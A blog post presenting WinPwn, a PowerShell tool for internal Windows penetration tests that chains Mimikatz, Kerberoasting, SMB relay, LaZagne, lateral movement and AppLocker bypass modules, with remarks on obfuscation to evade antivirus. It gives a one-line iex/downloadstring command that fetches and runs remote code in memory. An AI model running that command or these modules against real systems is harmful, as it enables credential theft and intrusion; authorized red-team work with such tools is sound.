Popular Posts

Blog Archive

Search This Blog

WinPwn- Automation For Internal Windows Penetration Testing

Share it:

WinPwn- Automation For Internal Windows Penetration Testing

In many past internal penetration tests, often had problems with the existing Powershell Recon / Exploitation scripts due to missing proxy support. For this reason I wrote my own script with automatic proxy recognition and integration.

The script is mostly based on well-known large other offensive security Powershell projects. I only load them one after the other into RAM via IEX Downloadstring and partially automate the execution to save time.

Yes it is not a C# and it may be flagged by antivirus solutions. Windows Defender for example blocks some of the known scripts/functions.

Different local recon modules, domain recon modules, pivilege escalation and exploitation modules. Any suggestions, feedback and comments are welcome!

Just Import the Modules with "Import-Module .\WinPwn_v0.7.ps1" or with iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn_v0.7.ps1')

Functions available after Import:

  • WinPwn -> Guides the user through all functions/Modules with simple questions.
  • Inveigh -> Executes Inveigh in a new Console window (https://github.com/Kevin-Robertson/Inveigh), SMB-Relay attacks with Session management afterwards
  • sessionGopher -> Executes Sessiongopher and Asking for parameters (https://github.com/Arvanaghi/SessionGopher)
  • Mimikatzlocal -> Executes Invoke-WCMDump and Invoke-Mimikatz (https://github.com/PowerShellMafia/PowerSploit)
  • localreconmodules -> Collects system Informations, Executes passhunt (https://github.com/Dionach/PassHunt), Executes Get-Computerdetails and Just another Windows Privilege escalation script + Winspect (https://github.com/PowerShellMafia/PowerSploit, https://github.com/A-mIn3/WINspect, https://github.com/411Hall/JAWS)
  • JAWS -> Just another Windows Privilege Escalation script gets executed
  • domainreconmodules -> Different Powerview situal awareness functions get executed and the output stored on disk. In Addition a Userlist for DomainpasswordSpray gets stored on disk. An AD-Report is generated in CSV Files (or XLS if excel is installed) with ADRecon. (https://github.com/sense-of-security/ADRecon, https://github.com/PowerShellMafia/PowerSploit, https://github.com/dafthack/DomainPasswordSpray)
  • Privescmodules -> Executes different privesc scripts in memory (Sherlock https://github.com/rasta-mouse/Sherlock, PowerUp, GPP-Files, WCMDump)
  • lazagnemodule -> Downloads and executes lazagne.exe (if not detected by AV) (https://github.com/AlessandroZ/LaZagne)
  • latmov -> Searches for Systems with Admin-Access in the domain for lateral movement. Mass-Mimikatz can be used after for the found systems. Domainpassword-Spray for new Credentials can also be used here.
  • empirelauncher -> Launch powershell empire oneliner on remote Systems (https://github.com/EmpireProject/Empire)
  • shareenumeration -> Invoke-Filefinder and Invoke-Sharefinder from Powerview (Powersploit)
  • groupsearch -> Get-DomainGPOUserLocalGroupMapping - find Systems where you have Admin-access or RDP access to via Group Policy Mapping (Powerview / Powersploit)
  • Kerberoasting -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking
  • isadmin -> Checks for local admin access on the local system
  • Sharphound -> Downloads Sharphound and collects Information for the Bloodhound DB
  • adidnswildcard -> Create a Active Directory-Integrated DNS Wildcard Record and run Inveigh for mass hash gathering. (https://blog.netspi.com/exploiting-adidns/#wildcard)
  • The "oBEJHzXyARrq.exe"-Executable is an obfuscated Version of jaredhaights PSAttack Tool for Applocker/PS-Restriction Bypass (https://github.com/jaredhaight/PSAttack)


  • Get the scripts from my own creds repository (https://github.com/SecureThisShit/Creds) to be independent from changes in the original repositories.
  • Proxy Options via PAC-File are not correctly found in the moment
  • Obfuscate all Scripts for AV-Evasion


WinPwn is only using for educational purpose only


Share it: